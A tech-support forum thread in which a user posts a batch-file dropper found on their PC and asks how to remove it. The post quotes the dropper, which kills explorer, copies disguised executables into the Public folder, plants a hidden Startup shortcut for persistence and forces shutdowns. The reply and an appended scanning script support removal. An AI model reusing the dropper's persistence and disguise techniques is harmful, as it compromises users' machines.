How to remove this .bat file which resets every software in my pc?

Status
Not open for further replies.

Aman Tiwari

Reputable
Oct 7, 2014
I'm having a problem with my PC. It seems to be a virus, but I have no idea what it actually is. It appears as a shortcut to some existing folders (not any file), but when I checked its properties it's actually a .bat file, and on opening it with Notepad I saw the following (and to mention, there are two exe apps, namely "smss" & "taskeng", and if I click on these two the computer shuts down):
/*
path C:\Windows\System32
color fa
IF EXIST "C:\Users\Public\smss .exe" ( ECHO ) ELSE (taskkill /f /im explorer.exe
xcopy /h /y "smss .exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\taskeng .exe" ( ECHO ) ELSE (xcopy /h /y "taskeng .exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\Firewall.exe" ( ECHO ) ELSE (xcopy /h /y "Firewall.exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\Firewall .exe" ( ECHO ) ELSE (xcopy /h /y "Firewall .exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\explorer.exe" ( ECHO ) ELSE (xcopy /h /y "explorer.exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\explorer .exe" ( ECHO ) ELSE (xcopy /h /y "explorer .exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\Interop.IWshRuntimeLibrary.dll" ( ECHO ) ELSE (xcopy /h /y Interop.IWshRuntimeLibrary.dll "C:\Users\Public")
IF EXIST "%systemroot%\Microsoft.NET\Framework\v3.*" goto 3
IF EXIST "%systemroot%\Microsoft.NET\Framework\v4.*" goto 4
:3
IF EXIST "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound_Driver.lnk" (
ECHO "hur"
) ELSE (
attrib "Sound_Driver.lnk" -h -s
copy /y Sound_Driver.lnk "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
attrib "Sound_Driver.lnk" +h +s
attrib "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound_Driver.lnk" -h -s
shutdown /s /f /t 0
)
goto e
:4
IF EXIST "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound_Drivers.lnk" (
ECHO "hur"
) ELSE (
attrib "Sound_Drivers.lnk" -h -s
copy /y Sound_Drivers.lnk "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
attrib "Sound_Drivers.lnk" +h +s
attrib "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound_Drivers.lnk" -h -s
shutdown /s /f /t 0
)
:e
*/


Help me out people, I'm quite troubled with this thing!
 
Solution
Interesting bit of coding...

I'm guessing that's a home-made bit of malware. Have you had anyone mess with your PC recently?

Boot off a Linux LiveCD/USB, delete the stuff in Public, and delete the batch file. Then run a good antivirus, e.g. Malwarebytes.

Also:
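Added example (not part of the original thread or of the answer above): a shell sketch for the Linux live session the answer recommends, which lists the files the posted batch script copies into `Users\Public` and the `Sound_Driver(s).lnk` shortcut it plants in each profile's Startup folder. It assumes the Windows volume is already mounted (ideally read-only) at a path you pass in, such as the hypothetical `/mnt/win`, and that GNU `find` is available; it only reports paths and deletes nothing.

```shell
#!/bin/sh
# Added example: report the artifacts dropped by the batch script quoted in
# the question. Assumption: $1 is the mount point of the Windows volume.

# Names the batch script xcopy's into C:\Users\Public. Several carry a space
# before ".exe" so they look like genuine Windows binaries at a glance.
DROPPED_NAMES='smss .exe
taskeng .exe
Firewall.exe
Firewall .exe
explorer.exe
explorer .exe
Interop.IWshRuntimeLibrary.dll'

scan_dropper_artifacts() {
    root=$1
    if [ ! -d "$root/Users" ]; then
        echo "no Users directory under $root" >&2
        return 2
    fi

    # 1. Payload copies in Users/Public (exact names only, case-insensitive).
    printf '%s\n' "$DROPPED_NAMES" | while IFS= read -r name; do
        find "$root/Users/Public" -maxdepth 1 -type f -iname "$name" 2>/dev/null
    done

    # 2. Persistence: the shortcut copied into the Startup folder, checked
    #    for every profile rather than only the user who ran the script.
    find "$root/Users" -type f \
        \( -iname 'Sound_Driver.lnk' -o -iname 'Sound_Drivers.lnk' \) \
        -ipath '*/Start Menu/Programs/Startup/*' 2>/dev/null
}

# Number of artifacts found; 0 means none of the listed paths exist.
count_dropper_artifacts() {
    scan_dropper_artifacts "$1" | wc -l | tr -d ' '
}

# When run as a script with an argument, print the findings.
if [ "$#" -gt 0 ]; then
    scan_dropper_artifacts "$1"
fi
```

The batch script copies these files from the folder it is launched in, so the original copies sit next to the `.bat` file and are not covered by this listing.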